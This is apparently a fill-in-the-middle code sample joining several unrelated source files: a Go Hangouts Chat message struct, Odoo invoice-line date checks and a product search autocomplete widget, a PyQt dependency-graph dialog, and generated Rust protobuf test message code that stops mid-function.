Name string `json:"name"`
DisplayName string `json:"displayName"`
AvatarURL string `json:"avatarUrl"`
Email string `json:"email"`
Type string `json:"type"`
} `json:"user"`
Space struct {
Name string `json:"name"`
Type string `json:"type"`
DisplayName string `json:"displayName"`
} `json:"space"`
ConfigCompleteRedirectURL string `json:"configCompleteRedirectUrl"`
}
<|fim▁hole|>// ReplyThread is a part of reply messages
type ReplyThread struct {
Name string `json:"name,omitempty"`
}
// ReplyMessage is partial hangouts format of messages used
// For details see
// https://developers.google.com/hangouts/chat/reference/rest/v1/spaces.messages#Message
type ReplyMessage struct {
Text string `json:"text"`
Thread *ReplyThread `json:"thread,omitempty"`
}<|fim▁end|> | |
<|file_name|>account_invoice.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# © 2013-2016 Akretion (Alexis de Lattre <[email protected]>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError, UserError
class AccountInvoiceLine(models.Model):
_inherit = 'account.invoice.line'
start_date = fields.Date('Start Date')
end_date = fields.Date('End Date')
must_have_dates = fields.Boolean(
related='product_id.must_have_dates', readonly=True)
@api.multi
@api.constrains('start_date', 'end_date')
def _check_start_end_dates(self):
for invline in self:
if invline.start_date and not invline.end_date:
raise ValidationError(
_("Missing End Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and not invline.start_date:
raise ValidationError(
_("Missing Start Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and invline.start_date and \
invline.start_date > invline.end_date:
raise ValidationError(
_("Start Date should be before or be the same as "
"End Date for invoice line with Description '%s'.")
% (invline.name))
# Note : we can't check invline.product_id.must_have_dates
# have start_date and end_date here, because it would
# block automatic invoice generation/import. So we do the check
# upon validation of the invoice (see below the function
# action_move_create)
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
def inv_line_characteristic_hashcode(self, invoice_line):
"""Add start and end dates to hashcode used when the option "Group
Invoice Lines" is active on the Account Journal"""
code = super(AccountInvoice, self).inv_line_characteristic_hashcode(
invoice_line)
hashcode = '%s-%s-%s' % (
code,
invoice_line.get('start_date', 'False'),
invoice_line.get('end_date', 'False'),
)
return hashcode
@api.model
def line_get_convert(self, line, part):
"""Copy from invoice to move lines"""
res = super(AccountInvoice, self).line_get_convert(line, part)
res['start_date'] = line.get('start_date', False)
res['end_date'] = line.get('end_date', False)
return res
@api.model
def invoice_line_move_line_get(self):<|fim▁hole|> iline = ailo.browse(move_line_dict['invl_id'])
move_line_dict['start_date'] = iline.start_date
move_line_dict['end_date'] = iline.end_date
return res
@api.multi
def action_move_create(self):
"""Check that products with must_have_dates=True have
Start and End Dates"""
for invoice in self:
for iline in invoice.invoice_line_ids:
if iline.product_id and iline.product_id.must_have_dates:
if not iline.start_date or not iline.end_date:
raise UserError(_(
"Missing Start Date and End Date for invoice "
"line with Product '%s' which has the "
"property 'Must Have Start and End Dates'.")
% (iline.product_id.name))
return super(AccountInvoice, self).action_move_create()<|fim▁end|> | """Copy from invoice line to move lines"""
res = super(AccountInvoice, self).invoice_line_move_line_get()
ailo = self.env['account.invoice.line']
for move_line_dict in res: |
<|file_name|>000.js<|end_file_name|><|fim▁begin|>odoo.define('website_sale.s_products_searchbar', function (require) {
'use strict';
const concurrency = require('web.concurrency');
const publicWidget = require('web.public.widget');
const { qweb } = require('web.core');<|fim▁hole|>publicWidget.registry.productsSearchBar = publicWidget.Widget.extend({
selector: '.o_wsale_products_searchbar_form',
xmlDependencies: ['/website_sale/static/src/xml/website_sale_utils.xml'],
events: {
'input .search-query': '_onInput',
'focusout': '_onFocusOut',
'keydown .search-query': '_onKeydown',
},
autocompleteMinWidth: 300,
/**
* @constructor
*/
init: function () {
this._super.apply(this, arguments);
this._dp = new concurrency.DropPrevious();
this._onInput = _.debounce(this._onInput, 400);
this._onFocusOut = _.debounce(this._onFocusOut, 100);
},
/**
* @override
*/
start: function () {
this.$input = this.$('.search-query');
this.order = this.$('.o_wsale_search_order_by').val();
this.limit = parseInt(this.$input.data('limit'));
this.displayDescription = !!this.$input.data('displayDescription');
this.displayPrice = !!this.$input.data('displayPrice');
this.displayImage = !!this.$input.data('displayImage');
if (this.limit) {
this.$input.attr('autocomplete', 'off');
}
return this._super.apply(this, arguments);
},
//--------------------------------------------------------------------------
// Private
//--------------------------------------------------------------------------
/**
* @private
*/
_fetch: function () {
return this._rpc({
route: '/shop/products/autocomplete',
params: {
'term': this.$input.val(),
'options': {
'order': this.order,
'limit': this.limit,
'display_description': this.displayDescription,
'display_price': this.displayPrice,
'max_nb_chars': Math.round(Math.max(this.autocompleteMinWidth, parseInt(this.$el.width())) * 0.22),
},
},
});
},
/**
* @private
*/
_render: function (res) {
var $prevMenu = this.$menu;
this.$el.toggleClass('dropdown show', !!res);
if (res) {
var products = res['products'];
this.$menu = $(qweb.render('website_sale.productsSearchBar.autocomplete', {
products: products,
hasMoreProducts: products.length < res['products_count'],
currency: res['currency'],
widget: this,
}));
this.$menu.css('min-width', this.autocompleteMinWidth);
this.$el.append(this.$menu);
}
if ($prevMenu) {
$prevMenu.remove();
}
},
//--------------------------------------------------------------------------
// Handlers
//--------------------------------------------------------------------------
/**
* @private
*/
_onInput: function () {
if (!this.limit) {
return;
}
this._dp.add(this._fetch()).then(this._render.bind(this));
},
/**
* @private
*/
_onFocusOut: function () {
if (!this.$el.has(document.activeElement).length) {
this._render();
}
},
/**
* @private
*/
_onKeydown: function (ev) {
switch (ev.which) {
case $.ui.keyCode.ESCAPE:
this._render();
break;
case $.ui.keyCode.UP:
case $.ui.keyCode.DOWN:
ev.preventDefault();
if (this.$menu) {
let $element = ev.which === $.ui.keyCode.UP ? this.$menu.children().last() : this.$menu.children().first();
$element.focus();
}
break;
}
},
});
});<|fim▁end|> |
/**
* @todo maybe the custom autocomplete logic could be extract to be reusable
*/ |
<|file_name|>dependency_viewer.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington<|fim▁hole|>from PyQt4 import QtGui, Qt, QtCore
from opus_gui.general_manager.views.ui_dependency_viewer import Ui_DependencyViewer
class DependencyViewer(QtGui.QDialog, Ui_DependencyViewer):
def __init__(self, parent_window):
flags = QtCore.Qt.WindowTitleHint | QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowMaximizeButtonHint
QtGui.QDialog.__init__(self, parent_window, flags)
self.setupUi(self)
self.setModal(True) #TODO: this shouldn't be necessary, but without it the window is unresponsive
def show_error_message(self):
self.lbl_error.setVisible(True)
self.scrollArea.setVisible(False)
def show_graph(self, file_path, name):
self.lbl_error.setVisible(False)
self.scrollArea.setVisible(True)
self.setWindowTitle("Dependency graph of %s" % name)
self.image_file = file_path
pix = QtGui.QPixmap.fromImage(QtGui.QImage(file_path))
self.label.setPixmap(pix)
self.scrollAreaWidgetContents.setMinimumSize(pix.width(), pix.height())
self.label.setMinimumSize(pix.width(), pix.height())
rect = Qt.QApplication.desktop().screenGeometry(self)
self.resize(min(rect.width(), pix.width() + 35), min(rect.height(), pix.height() + 80))
self.update()
def on_closeWindow_released(self):
self.close()
os.remove(self.image_file)<|fim▁end|> | # See opus_core/LICENSE
import os |
<|file_name|>perftest_data.rs<|end_file_name|><|fim▁begin|>// This file is generated. Do not edit
#![allow(dead_code)]
#![allow(non_camel_case_types)]
#![allow(non_upper_case_globals)]
#![allow(unused_imports)]
use protobuf::Message as Message_imported_for_functions;
use protobuf::ProtobufEnum as ProtobufEnum_imported_for_functions;
#[derive(Clone,Default)]
pub struct Test1 {
// message fields
value: ::std::option::Option<i32>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl Test1 {
pub fn new() -> Test1 {
::std::default::Default::default()
}
pub fn default_instance() -> &'static Test1 {
static mut instance: ::protobuf::lazy::Lazy<Test1> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const Test1,
};
unsafe {
instance.get(|| {
Test1 {
value: ::std::option::Option::None,
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// optional int32 value = 1;
pub fn clear_value(&mut self) {
self.value = ::std::option::Option::None;
}
pub fn has_value(&self) -> bool {
self.value.is_some()
}
// Param is passed by value, moved
pub fn set_value(&mut self, v: i32) {
self.value = ::std::option::Option::Some(v);
}
pub fn get_value<'a>(&self) -> i32 {
self.value.unwrap_or(0)
}
}
impl ::protobuf::Message for Test1 {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
if wire_type != ::protobuf::wire_format::WireTypeVarint {
return ::std::result::Result::Err(::protobuf::ProtobufError::WireError("unexpected wire type".to_string()));
};
let tmp = try!(is.read_int32());
self.value = ::std::option::Option::Some(tmp);
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.value.iter() {
my_size += ::protobuf::rt::value_size(1, *value, ::protobuf::wire_format::WireTypeVarint);
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if let Some(v) = self.value {
try!(os.write_int32(1, v));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<Test1>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for Test1 {
fn new() -> Test1 {
Test1::new()
}
fn descriptor_static(_: ::std::option::Option<Test1>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_singular_i32_accessor(
"value",
Test1::has_value,
Test1::get_value,
));
::protobuf::reflect::MessageDescriptor::new::<Test1>(
"Test1",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for Test1 {
fn clear(&mut self) {
self.clear_value();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for Test1 {
fn eq(&self, other: &Test1) -> bool {
self.value == other.value &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for Test1 {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestRepeatedBool {
// message fields
values: ::std::vec::Vec<bool>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestRepeatedBool {
pub fn new() -> TestRepeatedBool {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestRepeatedBool {
static mut instance: ::protobuf::lazy::Lazy<TestRepeatedBool> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestRepeatedBool,
};
unsafe {
instance.get(|| {
TestRepeatedBool {
values: ::std::vec::Vec::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated bool values = 1;
pub fn clear_values(&mut self) {
self.values.clear();
}
// Param is passed by value, moved
pub fn set_values(&mut self, v: ::std::vec::Vec<bool>) {
self.values = v;
}
// Mutable pointer to the field.
pub fn mut_values<'a>(&'a mut self) -> &'a mut ::std::vec::Vec<bool> {
&mut self.values
}
// Take field
pub fn take_values(&mut self) -> ::std::vec::Vec<bool> {
::std::mem::replace(&mut self.values, ::std::vec::Vec::new())
}
pub fn get_values<'a>(&'a self) -> &'a [bool] {
&self.values
}
}
impl ::protobuf::Message for TestRepeatedBool {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_bool_into(wire_type, is, &mut self.values));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
my_size += 2 * self.values.len() as u32;
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
for v in self.values.iter() {
try!(os.write_bool(1, *v));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestRepeatedBool>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestRepeatedBool {
fn new() -> TestRepeatedBool {
TestRepeatedBool::new()
}
fn descriptor_static(_: ::std::option::Option<TestRepeatedBool>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_bool_accessor(
"values",
TestRepeatedBool::get_values,
));
::protobuf::reflect::MessageDescriptor::new::<TestRepeatedBool>(
"TestRepeatedBool",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestRepeatedBool {
fn clear(&mut self) {
self.clear_values();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestRepeatedBool {
fn eq(&self, other: &TestRepeatedBool) -> bool {
self.values == other.values &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestRepeatedBool {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestRepeatedPackedInt32 {
// message fields
values: ::std::vec::Vec<i32>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestRepeatedPackedInt32 {
pub fn new() -> TestRepeatedPackedInt32 {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestRepeatedPackedInt32 {
static mut instance: ::protobuf::lazy::Lazy<TestRepeatedPackedInt32> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestRepeatedPackedInt32,
};
unsafe {
instance.get(|| {
TestRepeatedPackedInt32 {
values: ::std::vec::Vec::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated int32 values = 1;
pub fn clear_values(&mut self) {
self.values.clear();
}
// Param is passed by value, moved
pub fn set_values(&mut self, v: ::std::vec::Vec<i32>) {
self.values = v;
}
// Mutable pointer to the field.
pub fn mut_values<'a>(&'a mut self) -> &'a mut ::std::vec::Vec<i32> {
&mut self.values
}
// Take field
pub fn take_values(&mut self) -> ::std::vec::Vec<i32> {
::std::mem::replace(&mut self.values, ::std::vec::Vec::new())
}
pub fn get_values<'a>(&'a self) -> &'a [i32] {
&self.values
}
}
impl ::protobuf::Message for TestRepeatedPackedInt32 {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_int32_into(wire_type, is, &mut self.values));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
if !self.values.is_empty() {
my_size += ::protobuf::rt::vec_packed_varint_size(1, &self.values);
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
if !self.values.is_empty() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
// TODO: Data size is computed again, it should be cached
try!(os.write_raw_varint32(::protobuf::rt::vec_packed_varint_data_size(&self.values)));
for v in self.values.iter() {
try!(os.write_int32_no_tag(*v));
};
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestRepeatedPackedInt32>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestRepeatedPackedInt32 {
fn new() -> TestRepeatedPackedInt32 {
TestRepeatedPackedInt32::new()
}
fn descriptor_static(_: ::std::option::Option<TestRepeatedPackedInt32>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_i32_accessor(
"values",
TestRepeatedPackedInt32::get_values,
));
::protobuf::reflect::MessageDescriptor::new::<TestRepeatedPackedInt32>(
"TestRepeatedPackedInt32",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestRepeatedPackedInt32 {
fn clear(&mut self) {
self.clear_values();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestRepeatedPackedInt32 {
fn eq(&self, other: &TestRepeatedPackedInt32) -> bool {
self.values == other.values &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestRepeatedPackedInt32 {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestRepeatedMessages {
// message fields
messages1: ::protobuf::RepeatedField<TestRepeatedMessages>,
messages2: ::protobuf::RepeatedField<TestRepeatedMessages>,
messages3: ::protobuf::RepeatedField<TestRepeatedMessages>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestRepeatedMessages {
pub fn new() -> TestRepeatedMessages {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestRepeatedMessages {
static mut instance: ::protobuf::lazy::Lazy<TestRepeatedMessages> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestRepeatedMessages,
};
unsafe {
instance.get(|| {
TestRepeatedMessages {
messages1: ::protobuf::RepeatedField::new(),
messages2: ::protobuf::RepeatedField::new(),
messages3: ::protobuf::RepeatedField::new(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// repeated .TestRepeatedMessages messages1 = 1;
pub fn clear_messages1(&mut self) {
self.messages1.clear();
}
// Param is passed by value, moved
pub fn set_messages1(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.messages1 = v;
}
// Mutable pointer to the field.
pub fn mut_messages1<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.messages1
}
// Take field
pub fn take_messages1(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.messages1, ::protobuf::RepeatedField::new())
}
pub fn get_messages1<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.messages1
}
// repeated .TestRepeatedMessages messages2 = 2;
pub fn clear_messages2(&mut self) {
self.messages2.clear();
}
// Param is passed by value, moved
pub fn set_messages2(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.messages2 = v;
}
// Mutable pointer to the field.
pub fn mut_messages2<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.messages2
}
// Take field
pub fn take_messages2(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.messages2, ::protobuf::RepeatedField::new())
}
pub fn get_messages2<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.messages2
}
// repeated .TestRepeatedMessages messages3 = 3;
pub fn clear_messages3(&mut self) {
self.messages3.clear();
}
// Param is passed by value, moved
pub fn set_messages3(&mut self, v: ::protobuf::RepeatedField<TestRepeatedMessages>) {
self.messages3 = v;
}
// Mutable pointer to the field.
pub fn mut_messages3<'a>(&'a mut self) -> &'a mut ::protobuf::RepeatedField<TestRepeatedMessages> {
&mut self.messages3
}
// Take field
pub fn take_messages3(&mut self) -> ::protobuf::RepeatedField<TestRepeatedMessages> {
::std::mem::replace(&mut self.messages3, ::protobuf::RepeatedField::new())
}
pub fn get_messages3<'a>(&'a self) -> &'a [TestRepeatedMessages] {
&self.messages3
}
}
impl ::protobuf::Message for TestRepeatedMessages {
fn is_initialized(&self) -> bool {
true
}
fn merge_from(&mut self, is: &mut ::protobuf::CodedInputStream) -> ::protobuf::ProtobufResult<()> {
while !try!(is.eof()) {
let (field_number, wire_type) = try!(is.read_tag_unpack());
match field_number {
1 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.messages1));
},
2 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.messages2));
},
3 => {
try!(::protobuf::rt::read_repeated_message_into(wire_type, is, &mut self.messages3));
},
_ => {
let unknown = try!(is.read_unknown(wire_type));
self.mut_unknown_fields().add_value(field_number, unknown);
},
};
}
::std::result::Result::Ok(())
}
// Compute sizes of nested messages
#[allow(unused_variables)]
fn compute_size(&self) -> u32 {
let mut my_size = 0;
for value in self.messages1.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.messages2.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
for value in self.messages3.iter() {
let len = value.compute_size();
my_size += 1 + ::protobuf::rt::compute_raw_varint32_size(len) + len;
};
my_size += ::protobuf::rt::unknown_fields_size(self.get_unknown_fields());
self.cached_size.set(my_size);
my_size
}
fn write_to_with_cached_sizes(&self, os: &mut ::protobuf::CodedOutputStream) -> ::protobuf::ProtobufResult<()> {
for v in self.messages1.iter() {
try!(os.write_tag(1, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.messages2.iter() {
try!(os.write_tag(2, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
for v in self.messages3.iter() {
try!(os.write_tag(3, ::protobuf::wire_format::WireTypeLengthDelimited));
try!(os.write_raw_varint32(v.get_cached_size()));
try!(v.write_to_with_cached_sizes(os));
};
try!(os.write_unknown_fields(self.get_unknown_fields()));
::std::result::Result::Ok(())
}
fn get_cached_size(&self) -> u32 {
self.cached_size.get()
}
fn get_unknown_fields<'s>(&'s self) -> &'s ::protobuf::UnknownFields {
&self.unknown_fields
}
fn mut_unknown_fields<'s>(&'s mut self) -> &'s mut ::protobuf::UnknownFields {
&mut self.unknown_fields
}
fn type_id(&self) -> ::std::any::TypeId {
::std::any::TypeId::of::<TestRepeatedMessages>()
}
fn as_any(&self) -> &::std::any::Any {
self as &::std::any::Any
}
fn descriptor(&self) -> &'static ::protobuf::reflect::MessageDescriptor {
::protobuf::MessageStatic::descriptor_static(None::<Self>)
}
}
impl ::protobuf::MessageStatic for TestRepeatedMessages {
fn new() -> TestRepeatedMessages {
TestRepeatedMessages::new()
}
fn descriptor_static(_: ::std::option::Option<TestRepeatedMessages>) -> &'static ::protobuf::reflect::MessageDescriptor {
static mut descriptor: ::protobuf::lazy::Lazy<::protobuf::reflect::MessageDescriptor> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const ::protobuf::reflect::MessageDescriptor,
};
unsafe {
descriptor.get(|| {
let mut fields = ::std::vec::Vec::new();
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"messages1",
TestRepeatedMessages::get_messages1,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"messages2",
TestRepeatedMessages::get_messages2,
));
fields.push(::protobuf::reflect::accessor::make_repeated_message_accessor(
"messages3",
TestRepeatedMessages::get_messages3,
));
::protobuf::reflect::MessageDescriptor::new::<TestRepeatedMessages>(
"TestRepeatedMessages",
fields,
file_descriptor_proto()
)
})
}
}
}
impl ::protobuf::Clear for TestRepeatedMessages {
fn clear(&mut self) {
self.clear_messages1();
self.clear_messages2();
self.clear_messages3();
self.unknown_fields.clear();
}
}
impl ::std::cmp::PartialEq for TestRepeatedMessages {
fn eq(&self, other: &TestRepeatedMessages) -> bool {
self.messages1 == other.messages1 &&
self.messages2 == other.messages2 &&
self.messages3 == other.messages3 &&
self.unknown_fields == other.unknown_fields
}
}
impl ::std::fmt::Debug for TestRepeatedMessages {
fn fmt(&self, f: &mut ::std::fmt::Formatter) -> ::std::fmt::Result {
::protobuf::text_format::fmt(self, f)
}
}
#[derive(Clone,Default)]
pub struct TestOptionalMessages {
// message fields
message1: ::protobuf::SingularPtrField<TestOptionalMessages>,
message2: ::protobuf::SingularPtrField<TestOptionalMessages>,
message3: ::protobuf::SingularPtrField<TestOptionalMessages>,
// special fields
unknown_fields: ::protobuf::UnknownFields,
cached_size: ::std::cell::Cell<u32>,
}
impl TestOptionalMessages {
pub fn new() -> TestOptionalMessages {
::std::default::Default::default()
}
pub fn default_instance() -> &'static TestOptionalMessages {
static mut instance: ::protobuf::lazy::Lazy<TestOptionalMessages> = ::protobuf::lazy::Lazy {
lock: ::protobuf::lazy::ONCE_INIT,
ptr: 0 as *const TestOptionalMessages,
};
unsafe {
instance.get(|| {
TestOptionalMessages {
message1: ::protobuf::SingularPtrField::none(),
message2: ::protobuf::SingularPtrField::none(),
message3: ::protobuf::SingularPtrField::none(),
unknown_fields: ::protobuf::UnknownFields::new(),
cached_size: ::std::cell::Cell::new(0),
}
})
}
}
// optional .TestOptionalMessages message1 = 1;
pub fn clear_message1(&mut self) {
self.message1.clear();
}
pub fn has_message1(&self) -> bool {
self.message1.is_some()
}
// Param is passed by value, moved
pub fn set_message1(&mut self, v: TestOptionalMessages) {
self.message1 = ::protobuf::SingularPtrField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_message1<'a>(&'a mut self) -> &'a mut TestOptionalMessages {
if self.message1.is_none() {
self.message1.set_default();
};
self.message1.as_mut().unwrap()
}
// Take field
pub fn take_message1(&mut self) -> TestOptionalMessages {
self.message1.take().unwrap_or_else(|| TestOptionalMessages::new())
}
pub fn get_message1<'a>(&'a self) -> &'a TestOptionalMessages {
self.message1.as_ref().unwrap_or_else(|| TestOptionalMessages::default_instance())
}
// optional .TestOptionalMessages message2 = 2;
pub fn clear_message2(&mut self) {
self.message2.clear();
}
pub fn has_message2(&self) -> bool {
self.message2.is_some()
}
// Param is passed by value, moved
pub fn set_message2(&mut self, v: TestOptionalMessages) {
self.message2 = ::protobuf::SingularPtrField::some(v);
}
// Mutable pointer to the field.
// If field is not initialized, it is initialized with default value first.
pub fn mut_message2<'a>(&'a mut self) -> &'a mut TestOptionalMessages {
if self.message2.is_none() {
self.message2.set_default();
};
